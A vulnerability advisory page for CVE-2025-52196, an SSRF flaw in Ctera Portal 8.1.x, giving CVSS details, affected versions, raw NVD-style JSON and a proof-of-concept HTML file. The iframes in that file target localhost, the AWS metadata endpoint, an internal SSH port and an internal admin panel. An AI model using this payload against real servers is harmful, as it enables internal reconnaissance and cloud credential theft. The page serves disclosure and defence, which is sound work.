Security Vulnerability Report
中文
CVE-2025-52196 CVSS 7.5 HIGH

CVE-2025-52196

Published: 2025-12-16 18:16:13
Last Modified: 2026-01-02 14:38:43

Description

Server-Side Request Forgery (SSRF) vulnerability in Ctera Portal 8.1.x (8.1.1417.24) allows remote attackers to induce the server to make arbitrary HTTP requests via a crafted HTML file containing an iframe.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ctera:ctera:8.1.1417.24:*:*:*:*:*:*:* - VULNERABLE
Ctera Portal 8.1.x (8.1.1417.24)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-52196 PoC - SSRF via iframe in HTML --> <!DOCTYPE html> <html> <head> <title>CVE-2025-52196 PoC</title> </head> <body> <h1>SSRF Exploit via iframe</h1> <!-- Example 1: Basic SSRF to internal service --> <iframe src="http://localhost:8080/internal-api" width="100%" height="500"></iframe> <!-- Example 2: AWS EC2 Metadata Service --> <iframe src="http://169.254.169.254/latest/meta-data/" width="100%" height="500"></iframe> <!-- Example 3: Scan internal port --> <iframe src="http://192.168.1.1:22" width="100%" height="500"></iframe> <!-- Example 4: Access internal admin panel --> <iframe src="http://internal-admin.local/secret/admin.php" width="100%" height="500"></iframe> <script> console.log('CVE-2025-52196 PoC loaded'); // The server will fetch these URLs via iframe src attributes // allowing SSRF attack against internal resources </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52196", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:12.840", "lastModified": "2026-01-02T14:38:43.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Ctera Portal 8.1.x (8.1.1417.24) allows remote attackers to induce the server to make arbitrary HTTP requests via a crafted HTML file containing an iframe."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ctera:ctera:8.1.1417.24:*:*:*:*:*:*:*", "matchCriteriaId": "A18B43E4-0F76-4C22-A14B-BC6F5BE26E00"}]}]}], "references": [{"url": "https://gist.github.com/simonecris/99baeb07fe6e1803d461e44031819cd3", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://kb.ctera.com/docs/81x-portal", "source": "[email protected]", "tags": ["Release Notes"]}]}}